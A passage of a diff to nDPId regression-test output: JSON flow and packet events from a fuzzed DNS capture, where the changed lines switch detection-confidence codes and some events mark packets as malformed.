-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470356585,"flow_last_seen":1120470356585,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470356585,"flow_last_seen":1120470356585,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1120470357579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470357579,"pkt":"ADBUADRWAODtAW69CABFAABIavoAAIARTFfAqAECwKgBAQrWADUANFcM0uIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":383,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470356585,"flow_last_seen":1120470357579,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470357579,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":383,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470356585,"flow_last_seen":1120470357579,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470357579,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1120470359581,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470359581,"pkt":"ADBUADTdAODtAW69CABFSQBIavMAAIARTFbAqAECwKgBAQrWADUANFcM0uIBAAABAAAAAAAABF9zaXAEX3VkcAxzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470356585,"flow_last_seen":1120470359581,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470359581,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470356585,"flow_last_seen":1120470359581,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470359581,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470361584,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1120470361584,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470361584,"pkt":"ADBUAEtWAODtAW69CABFAABIavwAAIARTFXAqAkCwKgBAQrWADUANFcM2uIBAAAAAAAAJXMABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470361584,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470361584,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00885{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470175647,"flow_last_seen":1120470179653,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470373592,"flow_last_seen":1120470373592,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1120470373592,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470373592,"pkt":"ADBUADRWAODtAW69CABFAABEav4AAIARTFfAqAECwKgBAQrXADUAMHoFquIAAAABAAAAAAAIATEBMAEwAzEyNwdpbi1hUWSWBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470373592,"flow_last_seen":1120470373592,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-aqd?.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470373592,"flow_last_seen":1120470373592,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-aqd?.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1120470373593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470373593,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CtcAR1yBquKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470373593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470373593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470373595,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1120470385615,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470385615,"pkt":"ADBUADRWAODtAW69CABFAABIawQAAIARTE3AqAECwKgBAQrYADUANPsJLuMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1120470386610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470386610,"pkt":"ADBUADRWAODtAW69CABFAABIawUAAKARTEzAqAECwKgBAQrYADUANEcJLuMBAAABAAAAAAAABV9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470385615,"flow_last_seen":1120470386610,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470386610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470385615,"flow_last_seen":1120470386610,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470386610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470388613} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470386610,"pkt":"ADBUADSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1120470390616,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470390616,"pkt":"ADBUADRWAODtAW69CABFAABIawsAAIARTEbAqAECwKgBAQrYADUANPsJLuMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470385615,"flow_last_seen":1120470390616,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470390616,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470385615,"flow_last_seen":1120470390616,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470390616,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00881{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by 